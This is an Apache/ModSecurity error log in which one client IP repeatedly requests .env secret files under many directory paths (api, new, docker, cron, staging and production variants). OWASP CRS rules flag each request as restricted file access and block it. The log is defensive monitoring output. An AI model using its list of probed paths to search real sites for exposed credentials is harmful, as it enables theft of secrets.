[Thu Nov 27 01:03:16.343107 2025] [:error] [pid 350835] [client 195.178.110.157:34368] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aSeVRM3-J6_qDUnxDyQSgwAAAAE"]
[Thu Nov 27 01:03:16.343296 2025] [:error] [pid 350835] [client 195.178.110.157:34368] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aSeVRM3-J6_qDUnxDyQSgwAAAAE"]
[Thu Nov 27 01:03:16.368410 2025] [:error] [pid 350835] [client 195.178.110.157:34368] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSeVRM3-J6_qDUnxDyQShAAAAAE"]
[Thu Nov 27 01:03:16.368655 2025] [:error] [pid 350835] [client 195.178.110.157:34368] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSeVRM3-J6_qDUnxDyQShAAAAAE"]
[Thu Nov 27 01:03:16.368860 2025] [:error] [pid 350835] [client 195.178.110.157:34368] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSeVRM3-J6_qDUnxDyQShAAAAAE"]
[Thu Nov 27 01:03:16.483839 2025] [authz_core:error] [pid 350836] [client 195.178.110.157:34372] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Thu Nov 27 01:03:16.507340 2025] [authz_core:error] [pid 350836] [client 195.178.110.157:34372] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Nov 27 01:03:16.530742 2025] [:error] [pid 350836] [client 195.178.110.157:34372] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aSeVRKWtpwlEodVKjNruAgAAAAI"]
[Thu Nov 27 01:03:16.530978 2025] [:error] [pid 350836] [client 195.178.110.157:34372] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aSeVRKWtpwlEodVKjNruAgAAAAI"]
[Thu Nov 27 01:03:16.531156 2025] [:error] [pid 350836] [client 195.178.110.157:34372] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aSeVRKWtpwlEodVKjNruAgAAAAI"]
[Thu Nov 27 01:03:20.015076 2025] [:error] [pid 350838] [client 195.178.110.157:34390] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSeVSFloYoeK3vI2n0LLJgAAAAg"]
[Thu Nov 27 01:03:20.015328 2025] [:error] [pid 350838] [client 195.178.110.157:34390] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSeVSFloYoeK3vI2n0LLJgAAAAg"]
[Thu Nov 27 01:03:20.015524 2025] [:error] [pid 350838] [client 195.178.110.157:34390] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSeVSFloYoeK3vI2n0LLJgAAAAg"]
[Thu Nov 27 01:03:29.927601 2025] [:error] [pid 350847] [client 195.178.110.157:46686] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSeVUaFYQXAaYCyOv5ADdQAAAAM"]
[Thu Nov 27 01:03:29.927831 2025] [:error] [pid 350847] [client 195.178.110.157:46686] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSeVUaFYQXAaYCyOv5ADdQAAAAM"]
[Thu Nov 27 01:03:29.928001 2025] [:error] [pid 350847] [client 195.178.110.157:46686] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSeVUaFYQXAaYCyOv5ADdQAAAAM"]
[Thu Nov 27 01:03:29.966641 2025] [:error] [pid 350847] [client 195.178.110.157:46686] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aSeVUaFYQXAaYCyOv5ADdgAAAAM"]
[Thu Nov 27 01:03:29.966884 2025] [:error] [pid 350847] [client 195.178.110.157:46686] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aSeVUaFYQXAaYCyOv5ADdgAAAAM"]
[Thu Nov 27 01:03:29.967069 2025] [:error] [pid 350847] [client 195.178.110.157:46686] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aSeVUaFYQXAaYCyOv5ADdgAAAAM"]
[Thu Nov 27 01:03:33.285406 2025] [:error] [pid 351633] [client 195.178.110.157:46694] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVVUXxoFA2gQuzslPZbAAAAAU"]
[Thu Nov 27 01:03:33.285708 2025] [:error] [pid 351633] [client 195.178.110.157:46694] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVVUXxoFA2gQuzslPZbAAAAAU"]
[Thu Nov 27 01:03:33.285913 2025] [:error] [pid 351633] [client 195.178.110.157:46694] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVVUXxoFA2gQuzslPZbAAAAAU"]
[Thu Nov 27 01:03:40.886669 2025] [:error] [pid 350836] [client 195.178.110.157:56144] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVXKWtpwlEodVKjNruAwAAAAI"]
[Thu Nov 27 01:03:40.886923 2025] [:error] [pid 350836] [client 195.178.110.157:56144] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVXKWtpwlEodVKjNruAwAAAAI"]
[Thu Nov 27 01:03:40.887096 2025] [:error] [pid 350836] [client 195.178.110.157:56144] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVXKWtpwlEodVKjNruAwAAAAI"]
[Thu Nov 27 01:03:51.482748 2025] [:error] [pid 350837] [client 195.178.110.157:49164] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVZ0PaLYrVvHbFrPTsRwAAAAY"]
[Thu Nov 27 01:03:51.482988 2025] [:error] [pid 350837] [client 195.178.110.157:49164] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVZ0PaLYrVvHbFrPTsRwAAAAY"]
[Thu Nov 27 01:03:51.483179 2025] [:error] [pid 350837] [client 195.178.110.157:49164] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSeVZ0PaLYrVvHbFrPTsRwAAAAY"]
[Thu Nov 27 01:04:31.860820 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aSeVj5ES3tECXuZM229rGwAAAAQ"]
[Thu Nov 27 01:04:31.861056 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aSeVj5ES3tECXuZM229rGwAAAAQ"]
[Thu Nov 27 01:04:31.861320 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aSeVj5ES3tECXuZM229rGwAAAAQ"]
[Thu Nov 27 01:04:32.133219 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aSeVkJES3tECXuZM229rHAAAAAQ"]
[Thu Nov 27 01:04:32.133608 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aSeVkJES3tECXuZM229rHAAAAAQ"]
[Thu Nov 27 01:04:32.133946 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aSeVkJES3tECXuZM229rHAAAAAQ"]
[Thu Nov 27 01:04:32.448277 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSeVkJES3tECXuZM229rHQAAAAQ"]
[Thu Nov 27 01:04:32.448503 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSeVkJES3tECXuZM229rHQAAAAQ"]
[Thu Nov 27 01:04:32.448714 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSeVkJES3tECXuZM229rHQAAAAQ"]
[Thu Nov 27 01:04:32.860881 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aSeVkJES3tECXuZM229rHgAAAAQ"]
[Thu Nov 27 01:04:32.861226 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aSeVkJES3tECXuZM229rHgAAAAQ"]
[Thu Nov 27 01:04:32.861502 2025] [:error] [pid 351272] [client 195.178.110.157:52648] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aSeVkJES3tECXuZM229rHgAAAAQ"]
[Thu Nov 27 01:04:48.714711 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSeVoKWtpwlEodVKjNruBAAAAAI"]
[Thu Nov 27 01:04:48.714987 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSeVoKWtpwlEodVKjNruBAAAAAI"]
[Thu Nov 27 01:04:48.715212 2025] [:error] [pid 350836] [client 195.178.110.157:37102] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSeVoKWtpwlEodVKjNruBAAAAAI"]
